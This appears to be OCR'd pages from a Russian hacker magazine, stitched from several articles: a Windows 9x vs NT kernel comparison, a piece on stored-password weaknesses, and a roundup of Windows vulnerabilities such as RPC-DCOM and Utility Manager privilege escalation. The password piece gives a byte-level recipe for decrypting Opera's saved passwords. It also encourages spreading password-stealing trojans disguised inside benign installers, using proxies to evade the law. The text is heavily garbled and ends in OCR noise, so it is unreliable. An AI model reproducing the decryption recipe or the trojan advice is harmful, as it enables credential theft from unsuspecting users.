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НУКЛОННАЯ 
СМЕСЬ 


ЧЕМ ОТЛИЧАЮТСЯ ЯДРА ХР ОТ 9Х 


W indows 98 - самая удачная операционная система из всех когда-либо 
созданных Microsoft. Настолько удачная, что даже затруднила 
продвижение Windows 2000 и Windows XP. 


вы (к великой радости! -- 
прим. AvaLANche'a), поддерж- 
ка Windows 98 прекращена, и 
переход на Windows ХР неиз- 
бежен. Говорят, в последние 
мгновения перед смертью человек вспоми- 
нает свое прошлое: свои добрые и дурные 
дела. Но операционная система не наделена 
сознанием :). Давай мы сравним ядро 
Windows 98 с ядром Windows МТ, чтобы 
знать, что мы теряем, а что получаем взамен. 

Наибольший интерес вызывают именно яд- 
ра систем, поскольку заложенные в них 
свойства не перекрываются прикладным 
уровнем и во многом определяют характер 
операционки в целом. Во избежание недора- 
зумений договоримся понимать Nog Windows 
МТ всю линейку МТ-подобных систем 
(Windows МТ, Windows 2000, Windows ХР и 
Windows Server 2003). Соответственно, под 
Windows 9x имеются в виду Windows 95, 
Windows 98 и Windows Ме. 


ПЕРЕНОСИМОСТЬ 

m Операционная система Windows МТ про- 
ектировалась с размахом и оптимизмом. Счи- 
талось, что процессоров будет становиться 
все больше и больше, поэтому главным кри- 
терием выбора операционной системы ста- 
нет ее переносимость. Феноменальная попу- 
лярность UNIX объяснялась отнюдь не прог- 
раммистскими качествами (с технической 
точки зрения архитектура системы была 
весьма убога и новизной идей совсем не 
блистала), а количеством поддерживаемых 
платформ. UNIX работала практически везде 
- от контроллеров лифта gO космических ко- 
раблей. Программа, написанная для одной 
платформы, простой перекомпиляцией пере- 
носилась на десяток-другой остальных (на 
самом деле, конечно, требовалось нечто 
большее, чем простая перекомпиляция). 

Расплата за переносимость - падение про- 
изводительности, порой существенное. 
Windows МТ практически целиком написана 
на языке Си. Ассемблерные строки обнаружи- 
ваются лишь в тонком слое абстрагирования 
от оборудования, содержащего первичные 
драйвера и аппаратно-зависимые функции. 
Благодаря этому обстоятельству Windows МТ 
была портирована на DEC Alpha и несколько 
других платформ, но долгое время игнориро- 
валась программистской общественностью, 
поскольку адекватных вычислительных мощ- 
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ностей в то время просто не существовало. 
Windows МТ ассоциировалась по меньшей 
мере с Кадиллаком или Шевроле. В настоя- 
щий момент Windows МТ реально работает 
только на одной платфрорме - IBM PC, а ос- 
тальные вымерли за ненадобностью. 

Windows 9x, ориентированная на хлипкие go- 
машние компьютеры, никогда не стремилась к 
переносимости и оптимизировалась под одну 
конкретную платерорму - IBM РС. Большое ко- 
личество ассемблерного кода обеспечивает 
высокую скорость. Без иронии, Windows 9х вы- 
полняется так быстро, как это только возмож- 
но, что особенно заметно на медленных маши- 
нах. С другой CTOpOHbI, Windows МТ содержит 
ряд прогрессивных алгоритмов по управлению 
системными ресурсами, и на быстрых машинах 
с достаточным количеством оперативной памя- 
ти (от128 Мбайт и выше) она существенно об- 
гоняет Windows 9x. 


МИНУСЫ ШИРОКОЙ РАЗРЯДНОСТИ 

= Microsoft, проводя агрессивную реклам- 
ную компанию, выдает разрядность кода за 
главное достоинство своих операционных 
систем. Сначала нам долго и упорно втирали, 
что Windows 9x - полностью 32-разрядная 
операционная система. Затем выяснилось, что 
"в военное время значение синуса угла может 
достигать четырех" и Windows МТ еще намно- 
го более 32-разрядна, чем Windows 9x :). 

Действительно, Windows 9x содержит боль- 
шое количество 16-разрядного кода, остав- 
ленного в системе по чисто техническим со- 
ображениям. Единственным х86 процессо- 
POM, тормозящим при выполнении 16-разряд- 
Horo кода, был и остается Pentium Pro, поль- 
зовавшийся большой популярностью у изго- 
товителей серверов и высокопроизводитель- 
ных (по тем временам) рабочих станций. Сов- 
ременные процессоры (Pentium 4 в частнос- 
ти) выполняют 16- и 32-разрядный код прак- 
тически с одинаковой скоростью. Причем 16- 
разрядный код в силу своей компактности 
зачастую выполняется даже быстрее! К тому 
же, он занимает меньше места на диске и в 
памяти. Другое дело, что 32-разрядный код 
существенно упрощает программирование. 
Но поскольку 16-разряные фрагменты кода 
глубоко зарыты в Windows 9x, никакой раз- 
ницы между Windows МТ и Windows 9x с пот- 
ребительской точки зрения нет. 

Но прогресс не стоит на месте, и разряд- 
ность кода непрерывно растет. Сейчас раз- 


рабатываются х86-совместимые про- 
цессоры, поддерживающие 64- и 128- 
разрядные режимы. 16- и 32-разряд- 
ный режимы сохранятся только в ви- 
де эмуляции и будут жутко тормозить. 
Естественно, сам по себе 64-разряд- 
ный режим не увеличивает скорости 
обработки данных, и, по большому 
счету, это просто хитрый маркетинго- 
вый трюк. Но нам, конечным пользо- 
вателям, от этого не легче! Windows 
9x будет крайне неэфорективна на Ta- 
ких машинах, а ее перенос потребует 
чудовищных и бессмысленных трудо- 
затрат. Перенести Windows NT гораз- 
go проще, и Microsoft действительно 
ее переносит (или во всяком случае 
пытается это сделать). Возникает воп- 
рос: какой процент 32-разрядного ко- 
да сохранится в 64/128-разрядных 
версиях Windows МТ? 


ПОЛНОТА ПОДДЕРЖКИ 
WIN32 API 

и Программный uHTepcpenc Windows 
3.1 был невероятно убог и противоре- 
чив. Поэтому группе разработчиков 
Windows Эх было поручено создать 
принципиально новый API, учитываю- 
щий горький опыт предыдущего API и 
призванный ликвидировать его сла- 
бые места. От разработчиков Windows 
МТ требовалось обеспечить обратную 
совместимость с Win32 API (именно та- 
кое название получил новый интер- 
фейс), на уровне одной из подсистем 
времени выполнения. Поначалу это 
никого особенно не взволновалпо, пос- 
кольку Windows МТ ориентировалась 
преимущественно Ha OS/2-npunome- 
ния, win32 долгое время оставался 
побочным проектом. Однако со 
смертью OS/2 и феерическим взле- 
том Windows 3.1 все изменилось и за- 


Windows 9x Windows NT 


дача совместимости с Windows 9x (в 
ее успехе уже никто не сомневался) 
вышла на передний план. 

Дико матерясь и проклиная Билла 
Гейтса, команда разработчиков 
Windows МТ существенно переработала 
программный интерфейс, добавив к не- 
му множество срункций, которых не бы- 
ло и не могло быть в рамках Windows 
Эх. Какое-то время разработчики пыта- 
лись найти компромисс, но потом поня- 
ли, что это бесполезно. И, махнув ру- 
кой, установили на место тех функций, 
которые они не смогли реализовать, 
своеобразные "заглушки", всегда возв- 
ращающие ошибку выполнения :). То 
есть формально сфункция есть, HO тол- 
ку от нее меньше, чем от нарисованно- 
го очага (помнишь Буратино?). 

Но это еще что! Некоторые функции 
в Windows 9x ведут себя иначе, чем в 
Windows МТ. Например, в Windows NT 
функция CreateFile может открывать 
не только срайл, но и устройство (ска- 
жем, физический диск), что делает ее 
сильно похожей Ha UNIX. К сожале- 
нию, Windows 9x таких шуток не пони- 
мает, и подобные программы на ней 
неработоспособны. Но программисты 
не могут позволить себе роскошь соз- 
давать программы, работающие толь- 
ко Ha Windows МТ, потому все преиму- 
щества последней до сих пор остают- 
ся невостребованными! 

Массовый переход Ha Windows ХР 
должен разрешить эту ситуацию (сей- 
час ее доля составляет 51% от всех 
инсталляций Windows - прим. 
AvaLANche'a), и, когда, наконец, 
Windows 9x умрет, программисты всего 
мира вздохнут с облегчением. Так как 
подгонять свои продукты под две ли- 
нейки принципиально различных опе- 
рационных систем никому не в кайфр. 


Переносимость не переносима переносима 
32 разрядный код, в 
Разрядность 16 и 32 разрядный код перспективе 64- и128- 
разрядный 
Полнота поддержки Win32 | поддерживается частично поддерживается полностью 
Поддержка 
многопроцессорности не поддерживается поддерживается 
на уровне слабого подобия между женщиной и правой 
Качество планирования левой руки рукой 
поддерживает любое часть драйверов встроена в 
Поддержка оборудования | оборудование, для которого ядро и требует переустановки 
только есть драйвера системы для своей замены 
надежная защита от 
Защищенность SHEEN GN непредумышленного взлома 


Ш Поклонники Windows 98 размышляют, стоит ли им переходить Ha 
ХР или продолжать игнорировать ее существование и впредь. Де- 
велоперы во всю штампуют оболочки, разукрашивающие интер- 
фейс Windows 98 на любой манер (кстати говоря, зачастую намно- 


го более симпатичный, чем ХР). Рассуждая о достоинствах и недос- 
татках различных операционных систем, большинство публикаций 
напирает на пользовательский интерфейс, комплектность штатной 
поставки и другие непринципиальные характеристики, легко устра- 
нимые установкой дополнительного программного обеспечения. 


Но АР! - всего лишь обертка вокруг 
функций ядра. Именно ядро заправ- 
ляет памятью, процессами, срайлами и 
потоками. Именно ядро ограничивает 
возможности прикладного интерсрей- 
са. И эти ограничения без переделки 
ядра никак не исправить. 


МНОГОПРОЦЕССОРНОСТЬ: 
НА ФИГА КОЗЕ БАЯН 

и Во времена создания Windows 9x 
никто и подумать не мог, что многоп- 
роцессорные компьютеры придут на 
рабочий стол. Поэтому, сколько про- 
цессоров ни было бы установлено, 
Windows 9x всегда задействует лишь 
один. Ну, не поддерживает она мно- 
гопроцессорность, хоть ты тресни! 

А вот в Windows МТ поддержка мно- 
гопроцессорности была заложена изна- 
чально. Разделение процессорных ре- 
сурсов происходит на уровне потоков. 
Серверные приложения, обрабатываю- 
щие каждое сетевое подключение в от- 
дельном потоке, линейно увеличивают 
производительность системы в зависи- 
мости от количества процессоров (поч- 
ти линейно - необходимо учесть нак- 
ладные расходы на межпроцессорное 
взаимодействие). Осрисные и игровые 
же компьютеры практически не имеют 
приложений, реально нуждающихся в 
многопроцессорности. К тому же, 
Pentium-4 полноценным "многопроцес- 
сором" очевидно не является с Нурег- 
Threading и обеспечивает мизерный 
прирост производительности. Поэтому 
переходить Ha Windows МТ ради одной 
многопроцессорности могут лишь чуда- 
ки, забывшие о том, что бесплатный 
сыр бывает только в мышеловке! 


ПОДДЕРЖКА ОБОРУДОВАНИЯ: 
САПЕР ОШИБСЯ ДВАЖДЫ 

m Ядро Windows 9x непосредствен- 
но не решает вопросов, связанных с 
поддержкой оборудования, и перек- 
ладывает эту задачу на устанавливае- 
мые драйвера. Напротив, в Windows 
ХР первичные драйвера встроены в 
само ядро, автоматически или вруч- 
ную выбираемое на стадии инсталля- 
ции операционной системы. Причем 
каждое ядро использует свой формат 
дерева устройств, поэтому о полной 
совместимости можно только мечтать. 

Аппаратная конфригурация Windows 9x 
может быть изменена в любой момент. 
В худшем случае это потребует перезаг- 
рузки (иногда нескольких перезагру- 
зок), но не более того. Windows ХР в по- 
добных случаях зачастую приходится 
переустанавливать целиком. И дело 
вовсе не в кривых руках. Это дефект в 
мозгах проектировщиков системы! 

Частая смена оборудования на тех, у 
кого стоит Windows МТ, действует угне- 
тающе (никому не понравится переус- 
танавливать операционную систему по 
несколько раз в день), и потому многие 
из них предпочитают Windows 9х. К со- 
жалению, так как ее поддержка прекра- 
щена, далеко не все современное обо- 


рудование имеет драйвера, предназна- yy 


Под 
Windows МТ 
понимается 
вся линейка 
МТ-подоб- 
ных систем: 
Windows 


Windows XP 
и Windows 
2003; nog 
Windows 9x: 
Windows 


Windows 98 
и Windows 
Me. 


Windows 9x, 
в отличие 
от Windows 
МТ, заточе- 
на nog IBM 
РС, которая 
использует- 
ся в домаш- 
них ПК. От- 
сюба нуле- 
вая перено- 
симость. 
Зато макси- 
мальное 
быстродей- 
ствие. 


Windows 9x 
- не пол- 
ностью 32- 
разрядная 
операцион- 
ная система 
и содержит 
частично 
16-разряд- 
ный код, 
необходи- 
мый в сис- 
теме. 
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Windows 9x 
He noggep- 
живает 
многопро- 
цессор- 
ность в 
принципе 
(когда ее 
писали, о 
многопро- 
цессорных 
компьюте- 
рах и не 
мечтали). 
Windows Эх 
всегда за- 
действует 
лишь один 
из процессо- 
ров, если их 
несколько. 


Для изме- 
нения аппа- 
ратной кон- 
фигурации 
Windows 9x 
достаточно 
перезагру- 
зить систе- 
му. В 
Windows ХР 
порой при- 
ходится пе- 
реустанав- 
ливать ось 
целиком. 


В Windows 
ХР многие 
драйвера 
встроены 
Henocpeg- 
ственно в 
ядро и 90- 
бавляются 
на стадии 
инсталля- 
ции опера- 
ционной 
системы. 
Из-за этого 
у ХР нет 
полной сов- 
местимости. 


ВВЕДЕНИЕ 


НУКЛОННАЯ СМЕСЬ )) 


ченные для Windows 9х. С течением 
времени ситуация будет только ухуд- 
шаться. В Windows МТ 4.0 Plug & Play 
менеджер представляет собой обыкно- 
венный драйвер, но, начиная с Windows 
2000, он встроен в ядро, и ты вынуж- 
ден его использовать независимо от 
того, хочешь ты этого или нет. Можно 
привести и другие примеры, из которых 
ясно, что ядро Windows МТ постепенно 
превращается в свалку, куда разработ- 
чики валят всякий хлам. Система дегра- 
дирует прямо на глазах, разваливаясь 
под собственной тяжестью... 


ПЛАНИРОВКА ПОТОКОВ 
ИЗВНЕ И ИЗНУТРИ 
Каждый процесс имеет, по мень- 

шей мере, один поток, а каждое при- 
ложение создает, по меньшей мере, 
один процесс. В многозадачных систе- 
мах потоки вынуждены бороться за 
процессорное время. Ситуация, когда 
один поток отнимает его у другого, на- 
зывается вытеснением. Операционная 
система играет роль главного распо- 
рядителя, координирующего выдачу 
порций процессорного времени (кван- 
тов) тем потокам, которые больше все- 
го в нем нуждаются. Иначе это назы- 
вается выбором наиболее оптималь- 
ной стратегии планирования, обеспе- 
чивающей наивысшую производи- 
тельность операционной системы. 

Пока количество потоков невелико, 
планировщику достаточно согнать их в 
одну очередь, обрабатываемую в "капи- 
талистическом" порядке (в первую оче- 
редь обрабатываются наиболее богатые, 
тьфу, приоритетные потоки). Kak cneg- 
ствие, если "правительство" не предпри- 
нимает никаких координирующих мер, с 
течением времени богатые все больше 
богатеют, отнимая ресурсы у остальных, 
анизкоприоритетные потоки могут и 
вовсе не получить управление. 

Планировщик Windows 9x исполь- 
зует довольно простые алгоритмы 
распределения процессорного вре- 
мени, оправдывающие себя только 
при небольшой численности потоков 
с идентичным приоритетом. 
Собственно говоря, редкий офисный 
пользователь работает более чем с 
двумя-тремя приложениям одновре- 
менно, поэтому на производитель- 
ность системы качество планирова- 
ния практически не влияет. Факти- 
чески разрыв между Windows 9x и 
Windows МТ удается заметить только 
на серверных приложениях. 


ЗАЩИЩЕННОСТЬ: ДОБРО- 
ВОЛЬНЫЙ ЗАКЛЮЧЕННЫЙ 
Главное преимущество Windows 
МТ перед Windows 9x - это, бесспор- 
но, ее защищенность. Система пол- 
ностью контролирует доступ ко всем 
системным ресурсам, что при пра- 
вильной политике администрирова- 
ния существенно понижает вероят- 
ность утечки конфиденциальных 
данных или их разрушения. Однако 
большинству домашних и офисных 
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пользователей просто нечего защи- 
щать и не от кого. Да и о какой защи- 
те может идти речь, если подавляю- 
щее большинство установивших 
Windows МТ постоянно входят в сис- 
тему под Администратором?! 

С обывательской точки зрения, 
Windows Эх может показаться более 
дружелюбна и демократична, чем 
Windows МТ, которая блокирует пря- 
мой доступ к оборудованию, нарушая 
работоспособность многих MS-DOS- 
программ (и другого древнего сосрта). 
Но MS-DOS сегодня уже давно почит- 
ся в бозе. 

К тому же, следует помнить, что все 
защиты создаются в первую очередь 
для честных людей. YBUGAT на двери 
амбарный замок, подергают-подергают 
и отойдут. Надолго задержать талант- 
ливого взломщика (или бездарного 


взломщика с огромным ломом) ни один 
замок не сможет! Не стоит лишать себя 
всех радостей жизни, устанавливая 
унылые решетки на окна и натягивая 
поверх забора колючую проволоку :). 


ЗАКЛЮЧЕНИЕ 

У каждого человека свои предпоч- 
тения. Кому-то нравится Windows 98, a 
кто-то тащится от Windows ХР. Но при 
всем уважении к обеим системам надо 
признать, что явных лидеров нет и быть 
не может. Microsoft пытается создать из 
Windows МТ универсальную систему, ко- 
торая бы удовлетворяла всех, что не- 
возможно по определению! Неоднок- 
ратно высказывалось мнение, что это 
сратальная ошибка, которая приведет 
компанию к гибели, особенно после се- 
рии дыр, обнаруженных в последних 
операционных системах. SE 
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С ЧЕМ ИХ ЕДЯТ 


m В настоящее время 


большая проблема - 

давно устаревшие 
стандарты (RFC), многие из которых 
утверждены еще в начале 90-х. К 
примеру, возьмем общеизвестный е- 
mail. Для получения почты необходи- 
мо указать пароль, значит, его надо 
либо каждый раз вводить при приеме, 
либо хранить где-то на диске. Введен- 
ная информация передается в откры- 
том виде, то есть перехватить ее тру- 
да не составляет, так же, как и восста- 
новление сохраненного пароля, имея 
физический доступ к компьютеру. Ко- 
нечно, стандарты эти расширяются, 
вводятся сложные схемы аутентидфи- 
кации (для е-тай, например, СКАМ- 
MD5), но то ли администраторы лени- 
вые, то ли программисты - расшире- 
ния эти не получили пока массового 
распространения. 

Вообще, доступ необязательно дол- 
жен ограничиваться кодовым словом - 
это могут быть и девайс вроде USB- 
{океп'а, смарт-карты, SSL-ceptucpukata 
и т.п. Популярно при авторизации ис- 
пользование хешей. Хеш является не- 
ким большим числом, сгенерирован- 
ным по определенному алгоритму, каж- 
goe такое число соответствует одному 
исходному значению. Простейший ал- 
горитм - сложение А$С!-кодов всех 
символов строки (пароля): 1234 = Kog(1) 
+ Kog(2) + Kog(3) + код(4) = 
41+42+43+44 = 170 (170 хеш строки 
1234"). Очевидно, что узнать по хешу 
исходную строку невозможно, кроме 
как полным перебором всех значений. 
Сервер хранит только хеш, а клиент 
формирует его из сохраненной/вве- 
денной строки либо хранит уже сфор- 
мированным. При авторизации вместо 
сравнения строк происходит сравне- 
ние хешей - исключен перехват пароля 
как по сети, так и локально. Хотя для 
большинства популярных алгоритмов 
(MD5, $НА1, GOST) перебор всех вари- 
антов строк длиной до 8 символов мо- 
жет быть выполнен за несколько ча- 
сов, поэтому имеет смысл использо- 
вать в пароле не менее 12 символов. 
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Для большинства популярных алгоритмов 
(МО5, SHA1, GOST) перебор всех вариантов 
строк длиной до 8 символов может быть 
выполнен за несколько часов. 
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УЯЗВИМОСТИ . 
ЛОКАЛЬНЫХ ПАРОЛЕЙ 

ш Можно выделить несколько групп 
уязвимостей: 

mw Слабые алгоритмы. 90% разра- 
ботчиков программного обеспечения 
обладают нулевыми знаниями в об- 
ласти криптографии, поэтому приду- 
мывают крайне простые алгоритмы. 

mw Ошибки в core. Был, к примеру, 
некий менеджер закачки, имя и па- 
роль к сайтами шифровались одина- 
ковым алгоритмом. Пароль не показы- 
вался, но выводилось имя пользова- 
теля. Так вот, если поменять местами 
имя и пароль в файле консригурации, 
то на месте имени будет выведен рас- 
шисфрованный пароль. 

ш Популярные алгоритмы. DES 
(3DES) в СВС-режиме с постоян- 


ным ключом и Baseé4. Приравни- 
вается к "слабым" из-за легкого 
анализа. Иногда достаточно запус- 
тить PelD, который по общеизвест- 
ным константам и таблицам опре- 
делит все используемые алгорит- 
мы в программе. 

m Необходимость обратного декрип- 
та. Для почты и веба сколько бы ты 
ни шифровал пароль, его все равно 
придется расшифровать для переда- 
чи в открытом виде серверу. 

и Вывод звездочек в окне. Вместо па- 
pons стандартный контроль Виноов вы- 
водит звездочки (****), что очень легко 
обходится сосфтом типа PassView. 

ш Кейлог. Практически любой па- 
роль можно стащить при его вводе, 
если на системе установлен кейлог. 
Защита от него есть, но спорная, так 
как от использования низкоуровне- 
вых драйверов ничего не спасет 
(обычно кейлог реализуется с по- 
мощью ловушек - hooks). 
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mw Небольшая длина. Это актуально 
для хешей. Если хеш хранится вместо 
пароля, но пароль очень короткий, то 
на его восстановление может уйти 
всего несколько секунд. На основе 
этой уязвимости подбирается локаль- 
ный админский пароль на МТ-систе- 
мах. При сохранении он делится на 
две части по 8 символов (остальные 
символы отбрасываются), каждая из 


частей переводится в верхний ре- 
гистр и хешируется. Понятно, что дли- 
на пароля и количество вариантов 
подбора малы. В последних сервиспа- 
ках система защиты была улучшена. 
Применяется так называемый алго- 
ритм syskey для шифрования данных 
о локальных пользователях (прове- 
рить наличие и установить защиту 
может каждый: открыть Пуск -> Вы- 
полнить, и ввести команду syskey). 

ш Простой формат хранимых дан- 
ных. Например, из-за сложного Cpop- 
мата .да-файлов в CuteFTP не суще- 
ствует пока нормальных дешиффров- 
щиков. Сложная структура не позво- 
ляет найти в файле нужные строки с 
шиффрованными паролями и данными 
о сайтах, при этом сам алгоритм ge- 
шифровки пароля прост. 


ХРАНЕНИЕ 
Где могут храниться пароли: 

@. Реестр/файлы. Разработчики 
часто здесь хранят все настройки, 
включая пароли, из-за несложного 
WinAPI. 

@. Альтернативные потоки NTFS. Нап- 
ример, "C:\somefile.txt:stream2", при этом 
данные somefile.txt и somefile.txt:stream2 
будут независимы. Таким образом, go- 
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offtopic, профессионал в области IT- 
безопасности, постоянный автор и 


модератор форумов проекта 
Securitylab.ru, MCSE и МСТ 


нашел 
не все 
секреты? 


ЧИТАЙ 
«ПУТЕВОДИТЕЛЬ»! 


* 192 полосы исчерпывающей информации об играх 
. Более 1500 чит-кодов 


* СО-диск с видеоуроками и базой кодов и прохождений 


+ Двухсторонний постер с детальными картами 
уровней и тактическими схемами 


* Прикольная наклейка с кодами 
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ПАРОЛИ И ПР 
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Популярно 
использова- 
ние хешей 
вместо па- 
pons, но оно 
имеет 
смысл при 
достаточно 
длинных 
паролях, 
чтобы нель- 
зя было 
взломать 
лобовым 
перебором. 


В 9х- и NT- 
системах 
для хране- 
ния конфи- 
денциаль- 
ной инфор- 
мации ис- 
пользуется 
сервис 
Protected 
Storage 
(для прог- 
рамм типа 
IE, MSN, 
Outlook), 
который 
физически 
является 
скрытой 
шифрован- 
ной ветвью 
реестра. 


вольно просто спрятать файл от посто- 
ронних глаз. К сожалению, метод не 
проходит на FATI6/FAT32. 

@. LSA (Local Security Authority), явля- 
ется защищенной подсистемой 
Windows, используемой gna аутентисри- 
кации и учета локальных пользовате- 
лей, но также позволяет хранить защи- 
щенные данные где-то в своих недрах. 
Метод на порядок сложнее первых двух. 

@. Protected Storage - специальный 
сервис для хранения конфиденци- 
альной информации, присутствует в 
9х- и МТ-системах, не документиро- 
ван. В основном используется прог- 
раммами Microsoft (IE, MSN, Outlook), 
физически является скрытой шифро- 
ванной ветвью реестра. В отличие от 
LSA, Protected Storage обладает gpe- 
BOBUGHON структурой и дает возмож- 
ность использовать несколько уров- 
ней безопасности, то есть перед чте- 
нием Item'oB с высоким уровнем бе- 
зопасности будет запрашиваться па- 
роль. Минус - под МТ можно остано- 
вить этот сервис. 


АЛГОРИТМ ДЕШИФРОВКИ 
НА ПРИМЕРЕ ОРЕВА 7 

m Opera сейчас является одним из на- 
иболее быстрых и удобных браузеров. 
Для облегчения запоминания паролей, 
по аналогии с IntelliForms в Internet 
Explorer, был создан Password Wand. 
При вводе пароля он предлагает ero 
сохранить, и при повторном посещении 
сайта/авторизации нужно указать 
лишь имя пользователя, а пароль подс- 
тавляется автоматически. Все введен- 
ные данные хранятся в срайле wand.dat 
(описание - на официальном сайте). 

Итак, сохраненный пароль состоит 
из двух частей: 8-байтовый ключ и 
шифрованая строка, размер которой 
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кратен 8. Для дешифровки необходи- 
мо проделать следующие операции: 

©. Взять МО5-хеш от магического 
массива (этот массив-вектор состоит 
из байт {Ох83, Ox7D, OxFC, ОхОЕ, Ox8E, 
OxB3, ОхЕЗ, Ox69, Ох7З, ОхАЕ, OxFF} и 
восьми байт ключа. 

©. Взять МО5-хеш от хеша, полу- 
ченного в предыдущем шаге, и вось- 
ми байт ключа. 

@. Использовать общеизвестный 
3DES (тройной DES) в режиме CBC 
для дешифровки пароля. IV при этом 
равен хешу, полученному во втором 
шаге (первые 8 байт). 192-битовый 
ключ равен хешу, полученному в пер- 
вом шаге, плюс 8 байт IV. 

@. Последний дешифрованный байт - 
количество неиспользуемой части бло- 
ка (из-за кратности 8 байтам). Удаляем. 
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Самый популярный метод 
добывания паролей - мыльные пони). 
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Затем выводим пароль, который 
всегда хранится в UNICODE. Hetuncp- 
ровка паролей от встроенного в Орега 
почтового клиента проходит по той 
же схеме, отличие только в магичес- 
ком массиве: {Ох83, OxC4, Ox04, Ох83, 
Ox7D, OxE4, Ox01, Ох75, ОхО5, Ох83, 
OxC8, OxFF, OxEB, ОхЗА}. 


СРЕДСТВА ДЛЯ ДОБЫВАНИЯ 

m Самый популярный метод добыва- 
ния паролей - мыльные пони :). Их су- 
ществует великое множество, разме- 
ром от 5 Кб go1 Мб. Объединяет их og- 
на задача - вытянуть как можно боль- 
ше информации и отослать пароли ав- 
тору на мыло, минуя огнестенку и про- 
тивовирус, если такие в наличии у 
жертвы. Но не стоит кидаться как го- 
лодный волк на полученные данные. 
Надо во всем знать меру и оберегать 
себя любимого от неприятностей - 
блюстители закона не дремлют. Если 
принятые пароли связаны с вебом или 
ЕТР, то без анонимного прокси ни-ни. 

Впариваться мыльные пони могут как 
угодно. Под предлогом лекарства от го- 
ловной боли, крякера интернета, уско- 
рителя закачки, но кул хацкер обязан 
склеить пони с чем-то добрым и хоро- 
шим. По крайне мере, запихнуть в инс- 
таллятор или придумать что-то свое. 


ЧТО ДЕЛАТЬ С ДОБЫТЫМИ 
ПАРОЛЯМИ? 

m Да что угодно! Можно ими любо- 
ваться, хвалиться и восхищаться :). 
Правда, если это пароль от FTP fsb.ru 
или что-то.до\, совет - трижды формат- 
нуть винт, продать квартиру и уехать 
жить в деревню, желательно африка- 
нскую, куда еще не дошло электриче- 
ство. Пароли можно хранить на чер- 
ный день, но для этого необходимо ис- 
пользовать РСР-диск для шифровки 
всех проблемных данных. Тогда, если 
вломятся дядьки в погонах, вероят- 
ность найти что-либо негативное бу- 
дет сведена к нулю. А вообще, проти- 
возаконными вещами не стоит зани- 
маться, разве что можно поэкспери- 
ментировать над своей системой :). 

К сожалению, разработчики софта о 
безопасности своих пользователей 


задумываются редко или не задумы- 
ваются вообще. Поэтому каждый дол- 
жен решать эту проблему самостоя- 
тельно. Черпай информацию из раз- 
личных онлайн-источников. 


www.asus.ru 


Серия видеокарт 
ASUS Extreme 
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ХИТОВЫЕ УЯЗВИМОСТИ р 


Докучаев Дмитрий aka Forb (forb@real.xakep. 
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САМЫЕ ПОПУЛЯРНЫЕ ДЫРКИ В WINDOWS И СОФТЕ 


RPC-DCOM И ASN.1 


m Об этом баге знает 


каждый школьник. Это 


была брешь в службе 


RPC, широко использу- 
емой в системе Windows. Об уязви- 
мости узнали 16 июля прошлого года, 
но подробности никто разглашать не 
собирался. Лишь потом стало извест- 
но, что программисты Microsoft gonyc- 
тили две ффатальных ошибки, которые 
приводили к переполнению буфера и 
позволяли взломать систему, со все- 
ми существующими на тот момент 
сервиспаками. В итоге, репутация М5 
была подмочена: эксплоит RPC DCOM, 
который вышел практически сразу 
после релиза бага, стал самой хито- 
вой хацкерской тулзой за всю исто- 
рию существования корпорации. 

Но скрипткиди с мощным оружием в 
руках - полбеды. Настоящая же на- 
пасть пришла после запуска червяч- 
ка MSBlast. Наверняка ты сам стано- 
вился жертвой вируса, симптомы ко- 
торого - частые перезагрузки, сооб- 
щения о завершении сервисов, стре- 
мительная утечка трафика и лишний 
файл msblast.exe, поселившийся в ка- 
талоге WINNT. За несколько дней чер- 
вяк поработил миллионы машин и 
принес миллиарды долларов убытка 
корпорации. Пострадала и сама 
Microsoft: в определенное время 
MSBlast старательно DDoS'un сайт 
www.windowsupdate.com. 

Bar в библиотеке ASN.1 (Abstract 
Syntax Notation One) появился no3g- 
Hee бреши DCOM. Однако из-за уязви- 
мости снова пострадала Microsoft и 
другие известные компании. А, каза- 
лось бы, обычное переполнение кучи. 
Оверлоад прослеживался в некото- 
рых функциях библиотеки 
MSASNI1.DLL (они отвечают за безо- 
пасную передачу данных). Именно из- 
за того что функции библиотеки ис- 
пользуются в сторонних приложениях 
(SSL в IIS, [Р-телефония, сервис [5а$$ 
ит.п.), уязвимость стала действитель- 
но хитовой. После ее релиза и выхода 
первых эксплоитов появился червя- 
чок Sasser, который за несколько ми- 
нут смог поиметь тысячи машин раз- 
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личных корпораций. Симптомы зара- 
жения похожи на MSBlast'oBckue. 

Защита: 

Единственная защита от разруши- 
тельных ошибок - специальные патчи, 
которые программисты заботливо вы- 
ложили Ha microsoft.com. Также мож- 
но закрыть фаерволом 135-Й, 139-й и 
445-й порты и спать спокойно. 

Подробнее: 

Об КРС-уязвимостях написано мно- 
жество статей. Можешь почитать 


статью о ОСОМ-баге в Хакере за 
09/2003 или Спеце за 08/2004 
"Buffer overflow", посвященном пере- 
полнению буфера. Также смотри 
www.securitylab.ru/42702.html - там находит- 
ся список уязвимых срункций в АЗМ/ и 
полное описание бага от еЕуез. 


БАГ В UTILITY 
MANAGER (ДЛЯ WIN2000) 

и Bar в менеджере был обнаружен с 
полгода назад, но совсем недавно 
умельцы-программисты написали ути- 
литу, позволяющую поднять права 
прямо из консоли. Суть бреши заклю- 
чается в следующем: взломщик за- 
пускает utilman (который выполняет- 
ся с ЗУЗТЕМ-привилегиями), затем об- 
ращается за помощью, а в качестве 
Бер-файла указывает cmd.exe. В ито- 
ге, взломщик получает полноценную 
администраторскую консоль. С по- 
мощью нехитрых АР!-вызовов был на- 
писан консольный эксплоит, повыша- 
ющий привилегии пользователя. 

Защита: 

Сначала эксплоит не был локализо- 
ван и мог сразить только английскую 
Винду. Через несколько 


= = 
ee В г м днеи грамотные люди go 
eae бились локализации, та- 
14 ле ни srtrar at ким образом, поставив 
i fe) bee eee | МИЯ ire al nog угрозу любую вер- 
р. a сию Win2k. Ho, как гово- 
eee И № ee рят пострадавшие и ата- 
| кА. кующие, эксплоит не дает 
Я beam 1 fi SN ee eee | me желаемых результатов 
rs Ш = r = i il а 
а Кадет те оо т ВЫ Ha Windows 2000 с чет- 
О ТЕ Г Г (eee | | вый а ве ll вертым сервиспаком. Вы- 
Пе] Бе в ПТИ № eee = Es 
Le воды делай сам :). 


БТ ИР 


sla Tes ket Shi oe 578 


1 pied die ieee © 
ep Тит 


Oe ие г ды = 


tre ps Ш . Pe ed eee 


= = 


The ge bie 


1 ow =f ее Не joie 4 


en ee eee 


PPPs t Presser reer rsa 


Ee Ce а SC) CC) 


ыы {pl И bee Ee ee ied bP Dede 
PETIT LEEI LEE LLL ELLER LEE ELLE ен рен реет LEE LEE LLL LEE EE 


= ТЕ He явы фан ыы БЫ ne ae = De выл ЭВ PF 
=: И Е Pde 2 
= aa me bt fered tkiaagh pai ней += бы iid 1 в -Бр Е -2 eee ты 


